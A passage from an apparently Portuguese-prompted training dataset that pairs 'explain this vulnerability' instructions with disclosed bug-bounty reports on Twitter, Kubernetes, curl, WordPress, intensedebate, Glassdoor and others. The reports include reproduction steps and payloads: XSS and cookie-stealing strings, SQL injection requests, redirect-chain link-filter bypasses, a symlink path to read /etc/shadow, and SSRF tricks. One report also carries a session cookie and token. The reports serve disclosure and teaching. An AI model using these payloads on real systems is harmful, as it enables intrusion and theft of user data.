"### Resumo da Vulnerabilidade\nTwitter released [Fleet](https://blog.twitter.com/ja_jp/topics/product/2020/ntroducing-fleets-new-way-to-join-the-conversation-jp.html) yesterday. This feature is working with few APIs, and these APIs are missing permission checks.\n\n### Passos para Reproduzir\n1. Install [twurl](https://github.com/twitter/twurl).\n 1. Authenticate as a read-only application.\n 1. Execute following command: `twurl /fleets/v1/create -X POST --header 'Content-Type: application/json' -d '{\"text\":\"Hey yo\"}'`\n 1. A fleet with `Hey yo` text will be created.\n\n### Impacto\nThe read-only application can publish fleets without getting Write permission. This issue has a similar impact to #434763" }, { "instruction": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Chained open redirects and use of Ideographic Full Stop defeat Twitter's approach to blocking links", "input": "", "output": "### Passos para Reproduzir\n1. Choose the target URL; let's take `https://ddosecrets.com` as an example.\n 2. Replace all occurrences of the ASCII period by the URL-encoded version of the [Ideographic Full Stop](https://unicode-table.com/en/3002/), i.e. `%E3%80%82`: `https://ddosecrets%E3%80%82com`.\n 3. URL-encode the result of step 2: `https%3A%2F%2Fddosecrets%25E3%2580%2582com`.\n 4. Append the result of step 3 to `https://analytics.twitter.com/daa/0/daa_optout_actions?action_id=4&rd=` and append `%3F` to the result: `https://analytics.twitter.com/daa/0/daa_optout_actions?action_id=4&rd=https%3A%2F%2Fddosecrets%25E3%2580%2582com%3F`.\n 5. URL-encode the result of step 4: `https%3A%2F%2Fanalytics.twitter.com%2Fdaa%2F0%2Fdaa_optout_actions%3Faction_id%3D4%26rd%3Dhttps%253A%252F%252Fddosecrets%2525E3%252580%252582com%253F`.\n 6. Append the result of step 5 to `https://twitter.com/login?redirect_after_login=`: `https://twitter.com/login?redirect_after_login=https%3A%2F%2Fanalytics.twitter.com%2Fdaa%2F0%2Fdaa_optout_actions%3Faction_id%3D4%26rd%3Dhttps%253A%252F%252Fddosecrets%2525E3%252580%252582com%253F`.\n 7. Log in to Twitter and tweet the URL resulting from step 6. Posting the tweet will succeed (but it shouldn't, if link validation were effective).\n 8. Click the malicious link in the tweet you just posted; you'll get redirected to the forbidden domain without being shown any Twitter interstitial page.\n\n(If you're not logged in to Twitter when you click the malicious link, you'll get prompted to log in, but you will still get redirected to the forbidden domain afterwards.)\n\n### Impacto\nAttackers can defeat [Twitter's approach to blocking links](https://help.twitter.com/en/safety-and-security/phishing-spam-and-malware-links) and post arbitrary unsafe links (starting with `https://twitter.com`, which really compounds the problem) in tweets." }, { "instruction": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Kubelet follows symlinks as root in /var/log from the /logs server endpoint", "input": "", "output": "### Resumo da Vulnerabilidade\nPrivilege escalation from a pod, to root read permissions on the entire filesytem of the node, by creating symlinks inside /var/log.\nThe kubelet is simply serving a fileserver at /var/log:\n\n_kubernetes\\pkg\\kubelet\\kubelet.go:1371_\n```golang\nif kl.logServer == nil {\n\t\tkl.logServer = http.StripPrefix(\"/logs/\", http.FileServer(http.Dir(\"/var/log/\")))\n\t}\n```\nThe kubelet naturally runs as root on the node, so this basically gives the ability for pods with write permissions to /var/log directory a directory traversal as a root user on the host (potentially taking over the whole cluster by getting secret keys)\nAn easy fix is checking the symlink destination, to figure out whether it is inside /var/lib/docker or other whitelisted paths to not break to mechanism of logs correlations\n\nA while back, I discovered this bug, when you didn't had the Bug Bounty program. \nI Published the following blog:\nhttps://blog.aquasec.com/kubernetes-security-pod-escape-log-mounts\nDescribing the vulnerability.\n\n(it requires RBAC permissions to read logs, or a kubelet configured with AlwaysAllow. and a mount point to any child directory inside /var/log)\nI researched some log collectors projects in github, seems like alot of them are freely using this mount point.\nAs a user I would not imagine those projects can potentially take clusters.\n\n### Passos para Reproduzir\n1. create a pod with a mount path to `/var/log`\n 1. create a symlink in the mount point: `/var/log/rootfs_symlink -> /`\n 1. curl from within the pod: `https://:10250/logs/rootfs_symlink/etc/shadow`\n\n### Impacto\nRoot read permissions on the entire filesystem of the node" }, { "instruction": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: XSS in Email Input [intensedebate.com]", "input": "", "output": "### Resumo da Vulnerabilidade\nI found an XSS in Email input. This input is not sanitized like other inputs allowing user to execute xss payloads.\n\n### Passos para Reproduzir\n1. Navigate to your account.\n2. In email address, add the below payload next to your email.\n`\">`\n\n### Impacto\nReflected XSS, An attacker can execute malicious javascript codes on the target application (email input specifically). It is highly recommended to fix this one because it is found in sensitive input (email).\n\nKind Regards." }, { "instruction": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Some build dependencies are downloaded over an insecure channel (without subsequent integrity checks)", "input": "", "output": "### Resumo da Vulnerabilidade\nBuild jobs [`mingw64 | openssl-1.1.1d`](https://github.com/OpenVPN/openvpn/blob/master/.travis.yml#L87) and [`mingw32 | openssl-1.0.2u`](https://github.com/OpenVPN/openvpn/blob/master/.travis.yml#L91) download dependencies from `build.openvpn.net` and `www.oberhumer.com`over an insecure channel (`http`, _not_ `https`) and do not check their integrity in any way.\n\nThis opens the door to person-in-the-middle attacks, whereby an attacker controlling an intermediate node on the network path between Travis CI's build servers and those two servers could manipulate traffic and inject his own malicious code into the artifacts produced by the two jobs in question.\n\n### Passos para Reproduzir\nThe `install` phase of the `.travis.yml` file [unconditionally executes](https://github.com/openvpn/openvpn/blob/master/.travis.yml#L120) the `.travis/build-deps.sh` script. If the following three conditions are satisfied,\n\n1. [the OS be other than `windows`](https://github.com/OpenVPN/openvpn/blob/master/.travis/build-deps.sh#L4),\n2. [environment variable `SSLLIB` be set to `openssl`](https://github.com/OpenVPN/openvpn/blob/master/.travis/build-deps.sh#L148), and\n3. [environment variable `CHOST` be set](https://github.com/OpenVPN/openvpn/blob/master/.travis/build-deps.sh#L161),\n\n(they are only satisfied for build jobs [`mingw64 | openssl-1.1.1d`](https://github.com/OpenVPN/openvpn/blob/master/.travis.yml#L87) and [`mingw32 | openssl-1.0.2u`](https://github.com/OpenVPN/openvpn/blob/master/.travis.yml#L91)), then shell functions `download_tap_windows` and `download_lzo` are executed [one](https://github.com/OpenVPN/openvpn/blob/master/.travis/build-deps.sh#L162) after the [other](https://github.com/OpenVPN/openvpn/blob/master/.travis/build-deps.sh#L165).\n\nShell functions `download_tap_windows` and `download_lzo` are defined above ([here](https://github.com/OpenVPN/openvpn/blob/master/.travis/build-deps.sh#L18) and [here](https://github.com/OpenVPN/openvpn/blob/master/.travis/build-deps.sh#L18), respectively) in `.travis/build-deps.sh`:\n\n```shell\ndownload_tap_windows () {\n if [ ! -f \"download-cache/tap-windows-${TAP_WINDOWS_VERSION}.zip\" ]; then\n wget -P download-cache/ \\\n \"http://build.openvpn.net/downloads/releases/tap-windows-${TAP_WINDOWS_VERSION}.zip\"\n fi\n}\n\ndownload_lzo () {\n if [ ! -f \"download-cache/lzo-${LZO_VERSION}.tar.gz\" ]; then\n wget -P download-cache/ \\\n \"http://www.oberhumer.com/opensource/lzo/download/lzo-${LZO_VERSION}.tar.gz\"\n fi\n}\n```\n\nNote that both `wget` commands use `http` as opposed to `https` ( though using `https` is readily possible, since both domains `build.openvpn.net` and `www.oberhumer.com` support `https` and have valid TLS certificates) .\n\n### Impacto\nThe two dependencies are downloaded over an insecure channel and, therefore, can be intercepted and tampered with by a person in the middle (controlling an intermediate node on the network path between Travis CI's build servers).\n\nMoreover, as no integrity checks seem to be performed after download, a person-in-the-middle attack would go undetected and could seriously compromise the integrity of the artifacts produced by those two build jobs.\n\nPlease do not dismiss the possibility of such an attack too quickly, as it is [not as far-fetched as one would think](https://medium.com/bugbountywriteup/want-to-take-over-the-java-ecosystem-all-you-need-is-a-mitm-1fc329d898fb)." }, { "instruction": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Email Verification bypass on signup", "input": "", "output": "### Resumo da Vulnerabilidade\nThis bug is related to wordpress.com. There is feature in wordpress.com which allow users to invite people. We have to enter email address to invite that particular person but the invite link and invite key is also available to the person who invited. This allow attackers to create the profile without having access to the email address and they can make account on behalf of any people who is not already signed up in wordpress.com\n\n### Passos para Reproduzir\nThis issue can be reproduced by following these easy steps: \n* Login to your account on wordpress.com\n* Setup burpsuite proxy with browser.\n* Select your site and navigate to manage>people\n* Enter any email address which is not already registered in wordpress.com and invite\n* Open this url in browser: https://wordpress.com/people/invites/yoursite.wordpress.com [change yoursite.wordpress.com with your site]\n* See the burp suite proxy tab and find the GET request to this endpoint [https://public-api.wordpress.com/rest/v1.1/sites/siteId_here/invites?http_envelope=1&status=all&number=100] [there will be a number instead of siteId_here]\n* In response of this GET request you will see JSON which will be consisting of the details about the invitations sent and there you will find \"invite_key\" and \"link\".\n* Copy the link and open this in another browser.\n* You can create account on behalf of this email without having access to the email and email verification is bypassed :)\n\n**See the attached video for POC**\n\n### Impacto\nThis issue can be used to bypass email verification on signup. Attackers can create account on behalf on any person without having access to the email account. This issue is affecting integrity of the wordpress.com" }, { "instruction": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: CVE-2020-8284: trusting FTP PASV responses", "input": "", "output": "### Resumo da Vulnerabilidade\nThe issue here arises from the fact that curl by default has the option CURLOPT_FTP_SKIP_PASV_IP disabled by default.\nAs a result, an attacker controlling the URL used by curl, can perform port scanning on behalf of the server where curl is running.\nThis can be achieved by setting up a custom FTP server that would setup the data channel through the PASV command using the port scanning target IP and port in the PASV connection info. \nOne good target for this issue are web applications vulnerable to SSRF.\n\n### Passos para Reproduzir\nSo we can differentiate between open, closed and filtered ports with the following:\n1. Open ports\ncurl will reply with TYPE after the PASV command\nexample:\nReceived: USER anonymous in 5\nReceived: PASS ftp@example.com in 5\nReceived: PWD in 5ms\nReceived: EPSV in 6ms\nReceived: PASV in 6ms\n**Received: TYPE I in 6ms**\nReceived: SIZE whatever in 5ms\nReceived: RETR whatever in 5ms\n\n2. Filtered\ncurl will timeout after the PASV command\nexample:\nReceived: USER anonymous in 6\nReceived: PASS ftp@example.com in 5\nReceived: PWD in 5ms\nReceived: EPSV in 6ms\nReceived: PASV in 5ms\nReceived: in **1011ms**\n\n3. Closed\ncurl will close the control channel connection immediately after PASV\nexample:\nReceived: USER anonymous in 6ms\nReceived: PASS ftp@example.com in 6ms\nReceived: PWD in 5ms\nReceived: EPSV in 5ms\nReceived: PASV in 5ms\nReceived: in **5ms**\n\nIn the attachments, I have included an ftp server (F1088885) that automates these steps.\nUsage:\n./ssrf_pasvaggresvftp.sh -t 127.0.0.1/31 -p 80,8000-8100 -x ./ftp_curl.sh -vv\n\nthe file included in the -x option is supposed to trigger the ssrf on the target server that would lead to the call of curl with the attacker's URL. In this case we simulate the issue by calling curl locally. The attachment F1088859 is the script used in the example.\n\n### Impacto\nThrough the port scanning, an attacker could uncover services running in the internal network.\nIt could also be possible to perform version enumeration or other information disclosure if the attacker can get back the results of curl.\nFor example, an attacker points curl at host:22 for the data channel . If an ssh server is running on that host, then it will reply with its version which is then disclosed to the attacker.\n\nUltimately, this issue can be used as a stepping stone to launch further attacks on the vulnerable server." }, { "instruction": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: [intensedebate.com] XSS Reflected POST-Based", "input": "", "output": "### Resumo da Vulnerabilidade\nHello, i have found a XSS Reflected POST-Based in `https://www.intensedebate.com/ajax.php`.\n\nVulnerable(s) URL :\n\n```POST /https://www.intensedebate.com/ajax.php```\n\nVulnerable(s) Parameter(s):\n\n```\n$_POST['txt'];\n```\n\nPayload\n\n```\nazertyuiop<<>\n```\n\n### Impacto\nA attacker can perform a phishing attack or perform a CORS attack" }, { "instruction": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Permanent DoS at https://happy.tools/ when inviting a user", "input": "", "output": "### Passos para Reproduzir\n1. Using separate browsers or browser containers, login to two different accounts. At least one account should have admin privileges in order to invite users.\n2. In the other account under the [preferences tab](https://schedule.happy.tools/preferences), notice the user email, change the email to ``boy_child@wearehackerone.com`` and save changes.\n3. In the admin account under the [users tab](https://schedule.happy.tools/admin/users), click on ``Invite team members`` and input the email ``boy_child@wearehackerone.com``.\n4. Scroll down and click on ``Send invite``.\n5. The request will fail.\n6. Repeat steps 2 to 4, but changing the email to that of other users (test accounts) and the request to send an invite link will continuously fail.\n\n### Impacto\nThrough user enumeration of emails and mass exploitation, there is a permanent denial of service denying a Happy Tools admin from adding team members to their organization." }, { "instruction": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Reflected XSS at https://www.glassdoor.com/ via the 'numSuggestions' parameter", "input": "", "output": "### Passos para Reproduzir\nGo to: `https://www.glassdoor.com/searchsuggest/typeahead?numSuggestions=8rk3s6%22%3Cimg/**/src%3D%22x%22/**/onx%3D%22%22/**/onerror%3D%22alert%60l0cpd%60%22%3Ef9y60`\n{F1092213}\n\n### Impacto\nThe attacker can execute JS code." }, { "instruction": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Async search stores authorization headers in clear text", "input": "", "output": "### Passos para Reproduzir\n```\n# This just triggers an async-search as yourself.\nPOST /_async_search?size=0&wait_for_completion_timeout=0\n{\n \"query\": {\n \"match_all\": {}\n }\n}\n\n# This shows where the clear text authorization header is stored\nPOST /.async-search/_search\n{\n \"_source\": \"headers.*\"\n}\n```\n\n### Impacto\n- Super users can get the clear text credentials of other users.\n- An XSS with a superuser victim can now trivially get the authorization headers of its target." }, { "instruction": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: HTTP2 'unknownProtocol' cause Denial of Service by resource exhaustion", "input": "", "output": "### Passos para Reproduzir\nThe following steps assume you are on a linux system. Everything will run on your host system. The IP in the client is hard-coded to `127.0.0.1` and the port is `50000`. The scripts are kept as simple as possible. \n\n1. Create a file `client.sh` with the content provided in the Supporting Material section below (don't start it now)\n2. Create the Javascript file (see Supporting Material section below) and run the example server (may you want to customize the port). You can also start a non-secure server using `createServer()` if you don't have an example key or cert around.\n3. You query the file descriptors with the command provided in the Supporting Material section below. Simply replace `{PID}` with the process id of your node server.\n4. Maybe you also want to watch the memory consumption with the tool you prefer.\n5. Now you are ready to start the client script.\n\nWe initially found this issue by running the Greenbone Vulnerability Manager on our server port with the **OvenVAS default** scanner, the **Fast and ultimate** configuration with all kind of vulnerability tests enabled and the **TCP-SYN Service Ping** alive check.\n\nThe affected code that causes this issue seems to be [here](https://github.com/nodejs/node/blob/c0ac692ba786f235f9a4938f52eede751a6a73c9/lib/internal/http2/core.js#L2918-L2929).\n\nWe are running on Linux x86 with kernel v4.19.148 with node v12.19.0.\n\n### Impacto\n:\nAny code that relies on the http2 server is affected by this behaviour. For example the JavaScript implementation of GRPC also uses a http2 server under the hood.\n\nThis attack has very low complexity and can easily trigger a DOS on an unprotected server.\n\nThe above server example consumes about 6MB memory after start-up. Running the described attack causes a memory consumption of more than 400MB in approximately 30s and holding more than 7000 file descriptors. Both, the file descriptors and the memory, are never freed." }, { "instruction": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: [intensedebate.com] SQL Injection Time Based On /js/commentAction/", "input": "", "output": "### Resumo da Vulnerabilidade\nHello,\n\nI have found a SQLI Injection Time Based on `/js/commentAction/`.\n\nWhen a user want to submit/reply to a comment, a JSON payload was send by a GET request.\n\n\n```GET /js/commentAction/?data={\"request_type\":\"0\",+\"params\":+{+\"firstCall\":true,+\"src\":0,+\"blogpostid\":504704482,+\"acctid\":\"251219\",+\"parentid\":\"0\",+\"depth\":\"0\",+\"type\":\"1\",+\"token\":\"7D0GVbxG10j8hndedjhegHsnfDrcv0Yh\",+\"anonName\":\"\",+\"anonEmail\":\"X\",+\"anonURL\":\"\",+\"userid\":\"26745290\",+\"token\":\"7D0GVbxG10j8hndedjhegHsnfDrcv0Yh\",+\"mblid\":\"1\",+\"tweetThis\":\"F\",+\"subscribeThis\":\"1\",+\"comment\":\"w\"}} HTTP/1.1\nHost: www.intensedebate.com```\n\nThe key `\"acctid\":\"251219\"` is vulnerable to SQL Injection Time based\n\n### Impacto\nFull database access holding private user information." }, { "instruction": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: CVE-2020-8285: FTP wildcard stack overflow", "input": "", "output": "### Resumo da Vulnerabilidade\nUser 'xnynx' on github filed [PR 6255](https://github.com/curl/curl/issues/6255) highlighting this problem. **Filed publicly**\n\nMy first gut reaction was that this had to be a problem with `curl_fnmatch` as that has caused us grief in the past (and on most platforms we use the native `fnmatch()` now, but not on Windows IIRC and this is a reported to happen on Windows), but I then built a test program and I made it crash in what seems like potential stack overflow due to recursive calls to `wc_statemach` from within itself.\n\n### Passos para Reproduzir\n1. build 6255.c (attached)\n 1. run it (with a debugger)\n 1. inspect the crash\n\nThe example app lists a directory with 40,000 files on funet.fi.\n\n### Impacto\nI haven't yet worked out exactly how to get what into the stack and what the worst kind of exploit of this might be, but a stack overflow that can be triggered by adding/crafting files in the server feels bad." }, { "instruction": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: SQL Injection Union Based", "input": "", "output": "### Resumo da Vulnerabilidade\nHello, \n\nI have found a SQL Injection Union Based on `https://intensedebate.com/commenthistory/$YourSiteId `\nThe `$YourSiteId` into the url is vulnerable to SQL Injection.\n\n### Impacto\nFull database access holding private user information and Reflected Cross-Site-Scripting" }, { "instruction": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: No rate limiting - Create data", "input": "", "output": "### Resumo da Vulnerabilidade\nHello team Stripo, how are you?\n\nI found a rate limit for data creation.\n\nTarget = https://my.stripo.email/cabinet/#/my-services/298427?tab=data-sources\n\nRequest to Post:\n\n```\nPOST /emailformdata/v1/amp-lists?projectId= HTTP/1.1\nHost: my.stripo.email\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/json;charset=UTF-8\nCache-Control: no-cache\nPragma: no-cache\nExpires: Sat, 01 Jan 2000 00:00:00 GMT\nX-XSRF-TOKEN: 3ef1a2b8-f640-457b-bac8-1d629d0f9498\nContent-Length: 198\nOrigin: https://my.stripo.email\nConnection: close\nReferer: https://my.stripo.email/cabinet/\nCookie: amplitude_id_246810a6e954a53a140e3232aac8f1a9stripo.email=eyJkZXZpY2VJZCI6ImU1NjAwZjk3LTFiY2QtNDIzOS1iZTczLWNmNWVhYmMzMTJkZFIiLCJ1c2VySWQiOm51bGwsIm9wdE91dCI6ZmFsc2UsInNlc3Npb25JZCI6MTYwNjc0NjU3NzcwMCwibGFzdEV2ZW50VGltZSI6MTYwNjc0Njg1ODg3OCwiZXZlbnRJZCI6MCwiaWRlbnRpZnlJZCI6MCwic2VxdWVuY2VOdW1iZXIiOjB9; _pin_unauth=dWlkPU1UUTFZemczWlRFdE1HSXdOeTAwT1Rrd0xUbGxNVEl0TWpBeE16WmpZVE00WlRZNA; _ga=GA1.2.730792257.1605012362; _pin_unauth=dWlkPU1UUTFZemczWlRFdE1HSXdOeTAwT1Rrd0xUbGxNVEl0TWpBeE16WmpZVE00WlRZNA; G_ENABLED_IDPS=google; __stripe_mid=e5538cc4-3896-4b96-b703-711ef38535d3313b41; _ga=GA1.3.730792257.1605012362; _gid=GA1.2.1102057235.1606746578; __stripe_sid=fcbc15d6-fe33-41ca-bd12-ad2a6fd80eb5a7fc3c; token=eyJhbGciOiJSUzUxMiJ9.eyJhdXRoX3Rva2VuIjoie1widXNlckluZm9cIjp7XCJpZFwiOjI5NDA3NyxcImVtYWlsXCI6XCJqYWFhaGJvdW50eUBnbWFpbC5jb21cIixcImxvY2FsZUtleVwiOlwicHRcIixcImZpcnN0TmFtZVwiOlwic2NyaXB0XCIsXCJsYXN0TmFtZVwiOlwiYm91bnR5XCIsXCJmYWNlYm9va0lkXCI6bnVsbCxcIm5hbWVcIjpudWxsLFwicGhvbmVzXCI6W10sXCJhY3RpdmVcIjp0cnVlLFwiZ3VpZFwiOm51bGwsXCJhY3RpdmVQcm9qZWN0SWRcIjoyOTg0MjcsXCJzdXBlclVzZXJWMlwiOmZhbHNlLFwiZ2FJZFwiOlwiY2JlOWMzMjItMDNhNS00NzQxLTlkMjYtNTc3MTc1MGI0M2MwXCIsXCJvcmdhbml6YXRpb25JZFwiOjI5MzgxNCxcIm93bmVkUHJvamVjdHNcIjpbMjk4NDI3XSxcImZ1bGxOYW1lXCI6XCJzY3JpcHQgYm91bnR5XCJ9LFwiaXNzdWVkQXRcIjoxNjA2NzQ2NjIwODUxLFwiYXBpS2V5XCI6bnVsbCxcInByb2plY3RJZFwiOm51bGwsXCJ4c3JmVG9rZW5cIjpcIjNlZjFhMmI4LWY2NDAtNDU3Yi1iYWM4LTFkNjI5ZDBmOTQ5OFwiLFwicm9sZVwiOlwiQ0FCSU5FVF9VU0VSXCIsXCJhdXRob3JpdGllc1wiOltdfSIsImV4cCI6MTYwNjgzMzAyMH0.qRAbnSN-DZWyUTUezJREviXpSgK1o_8U-3Rgt0xioXjID4apoWkfmPjt0vSnMcTRiF3oNLZmLC2FqnnMlMqqZb_v1Pv9Dn_gHSWOAF2s9IHn0tfJVPPh0BMTxDYfcFlvfMnGz9DMx7v4ETv7PJcSUwDBlFCMXcQ-kEa0AcSjOj7edpMJ2T18Xje3MgLx0Iq_u44HhYWxMaclL8FisL6Dqa13hQKijlCiV-H_jJSxEGpHgtUE0RPBI7kmWSMdW6flncHdf43S7An15uNxe6Dq6dbkuP3wpO_nO6IwNJLcxnt6s9_-ETCHXZIjMuNTKTs5zi0GoOA1OJ_8A1kCkN2cGal5ghD3fKpC4Slk5HkriZCHSvGf7tBgWJY7JCWCNMvucuKsUAeDjucFxB-wscr7iX6q6huJpCsa8gNNL_qR6PzwYF1kHuBRPTHCtF_PEcuqnc6LGfe9mCe6khdfGDKELGoTg8FtjZ-ce84oIhNLOSajzkJ3pbQ2vXB8B3Sm4lkjU85RzTMYhrNAF0zz6ZOzYqShg-QG60Yr66i07OcUXbw66R0ZH8YmH-ildoRtoJKNyloEuVMi-mz-KYZcRda1GHdBX-iEMto3ZXW7YL08DjdM9y07f0GnsSY_lBr_--nq73PxFd415D1sduoKkTDoSzOYIGT3dBK2D2PXpxiUUTs; _gid=GA1.3.1102057235.1606746578; JSESSIONID=A774ECEC8E8D7FB9527BC02A723054F8; intercom-session-b1m243ec=VWpock85SEcyYnRMZlVJcms0N1VCelVvdXd5b0J6eTFEWFh1QWIrZUpzSUlwbW8yT2RpdnZJamRnM3JtL3QrNi0tSVpVekFtR0s5c3RYV29MOGg5OUpQdz09--5e28d4d448f59bec98135e9bf373ff2ad64ab50d; _gat_UA-96386569-1=1\n\n{\"projectId\":298427,\"name\":\"ukibxiv4daehs7wdnupej63kgbm1aq.burpcollaborator.net\",\"description\":\"ukibxiv4daehs7wdnupej63kgbm1aq.burpcollaborator.net\",\"url\":null,\"identifier\":null,\"sourceType\":\"JSON\"}\n```\nThanks @OFJAAAH\n\n### Impacto\nThe attacker can charge the application, creating massively." }, { "instruction": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Non-revoked API Key Disclosure in a Disclosed API Key Disclosure Report on Stripo", "input": "", "output": "### Resumo da Vulnerabilidade\nCan you imagine discovering an API key disclosure vulnerability in a disclosed API key disclosure report? The same thing is what I came across while going through the disclosed reports at Stripo Inc. Plus, the disclosed API key isn't even revoked, and therefore I am still able to use the same API key to fetch response from the target.\n\nI am talking about #983331 where a security researcher reported secret API key leakage vulnerability in a JavaScript file at Stripo. This report is disclosed on HackerOne, and the team at Stripo have forgotten to blur the API keys from the report before disclosing it to the public. The API keys from Aviary and YouTube are disclosed in that report, and I tried using these API keys, and found out that they can still be used to fetch response from YouTube's API using Stripo's disclosed API key. I didn't check on Aviary though since I found out that Aviary is already a defunct image editor.\n\n### Passos para Reproduzir\n\n\n### Impacto\nBy taking an advantage of this vulnerability, an attacker would be able to use Stripo's YouTube API Key for calling different API endpoints in services provided in the YouTube Data API." }, { "instruction": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: PHP Info Exposing Secrets at https://radio.mtn.bj/info", "input": "", "output": "### Resumo da Vulnerabilidade\nDuring recon I discovered a PHP Info file exposing environment variables such as; Laravel APP_KEY, Database username/password, SMTP username/password, etc.\n\n### Passos para Reproduzir\nVisit the following URL;\n```\nhttps://radio.mtn.bj/info\n```\nYou will be presented with a PHP Info file exposing environment / PHP Variables.\n\n### Impacto\nExposing passwords to critical services.\nProviding application keys used for encryption/decryption within the app.\nSending email coming from an official email address." }, { "instruction": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Abusing URL Parsers by long schema name", "input": "", "output": "### Resumo da Vulnerabilidade\nThere is known technique to exploit inconsistency of URL parser and URL requester logic to perform Server Side Request Forgery attack. Firstly it was presented by Orange Tsai at [A New Era Of SSRF Exploiting URL Parser](https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf). Firstly I found the familiar issue at old versions of curl, but exploit did not seems works at latest releases. But now I'm ready to share new exploit of issue.\n\n### Passos para Reproduzir\nSchema parser logic of curl library is vulnerable to \"Abusing URL Parsers\". Malicious user can use this weakness to bypass whitelist protection and perform Server Side Request Forgery against targets, that use vulnerable version of library.\n\n 1. curl \"ssrf3.twowaysyncapp.tk://google.com\" Protocol \"ssrf3.twowaysyncapp.tk\" not supported or disabled in libcurl\n 1. curl \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.twowaysyncapp.tk://google.com\" Host aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.twowaysyncapp.tk requested\n\n### Impacto\nIncorrect schema parser logic will allow malicious user to bypass protection mechanism and get access to the internal infrastructure of affected web servers." }, { "instruction": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: [intensedebate.com] Open Redirect", "input": "", "output": "### Resumo da Vulnerabilidade\nI have found a Open Redirect on `https://intensedebate.com//fb-connect/logoutRedir.php?goto=`, the parameters `$_GET['goto']` is reflected to the HTTP-Header Response `Location`\n\nHTTP Request\n\n```\nGET /fb-connect/logoutRedir.php?goto=\\http://\\ HTTP/1.1\nHost: intensedebate.com\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:82.0) Gecko/20100101 Firefox/82.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3\nAccept-Encoding: gzip, deflate\nConnection: close\nCookie: y=y;\nUpgrade-Insecure-Requests: 1\n```\n\n\nHTTP Response\n\n```\nHTTP/1.1 302 Found\nServer: nginx\nDate: Thu, 03 Dec 2020 21:52:42 GMT\nContent-Type: text/html; charset=utf-8\nConnection: close\nP3P: CP=\"NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM\"\nSet-Cookie: fbName=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/\nSet-Cookie: fbUrl=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/\nSet-Cookie: fbPic=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/\nLocation: \\http://\\\nContent-Length: 0\n```\n\n### Impacto\nAn attacker can use this vulnerability to redirect users to other malicious websites, which can be used for phishing and similar attacks" }, { "instruction": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Bypass Tracking Blocker Protection Using Slashes Without Protocol On The Image Source.", "input": "", "output": "### Resumo da Vulnerabilidade\n- Some Way Has Been Discovered To Bypass Image Rewriting On HeyMail Using Slashes Without Protocol `\\/\\www.evil.com` That Allows Bypassing Tracking Blocker And Collect Users Information Via Emails.\n\n### Impacto\nBypassing Image Rewriting Function Witch Allows Trackers To Collect Users IPs Using Images." }, { "instruction": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: [sub.wordpress.com] - XSS when adjust block Poll - Confirmation Message - On submission:Redirect to another webpage - Redirect address:[xss_payload]", "input": "", "output": "### Resumo da Vulnerabilidade\nDear Wordpress Team,\n\nToday when I tried to create a post with block \"Poll\" and I have found at Poll Block -> Confirmation Message -> On submission:Redirect to another webpage and Redirect address:[xss_payload]\n\nAt Redirect address line, I can save the ```javascript:alert(document.cookie)``` as an URL webpage after submit a poll. And when an authenticated wordpress user submitted a poll, their cookies may stolen by attacker\n\n### Passos para Reproduzir\n1- Logged in your wordpress website and create a post with block Poll, fill question and some choices\n\n{F1104221}\n 2- Adjust Poll Block, Confirmation Message -> On submission:Redirect to another webpage and Redirect address:javascript:alert(document.cookie) then click Update/Publish your post\n\n{F1104220}\n 3- Go to your created poll and Submit, you will see xss popup\n\n{F1104222}\n\nYou can see video PoC below for the steps:\n{F1104231}\n\n### Impacto\nSteal cookies" }, { "instruction": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Code Injection via Insecure Yaml.load", "input": "", "output": "### Resumo da Vulnerabilidade\nThe Kubernetes repo and tool, [test-infra](https://github.com/kubernetes/test-infra), uses the insecure yaml.load() function to set or update the `Gubernator` configuration with a yaml file which allows for code injection.\nVulnerable Line of Code:\n[https://github.com/kubernetes/test-infra/blob/master/gubernator/main.py#L36](https://github.com/kubernetes/test-infra/blob/master/gubernator/main.py#L36)\n[https://github.com/kubernetes/test-infra/blob/master/gubernator/update_config.py#L35](https://github.com/kubernetes/test-infra/blob/master/gubernator/update_config.py#L35)\n[https://github.com/kubernetes/test-infra/blob/master/gubernator/update_config.py#L48](https://github.com/kubernetes/test-infra/blob/master/gubernator/update_config.py#L48) \nVulnerable Files and functions: main.py:get_app_config()\n update_config.py:main()\n\n### Passos para Reproduzir\n1. Install the `Gubernator` frontend.\n 2. save the provided `config.yaml` file as the 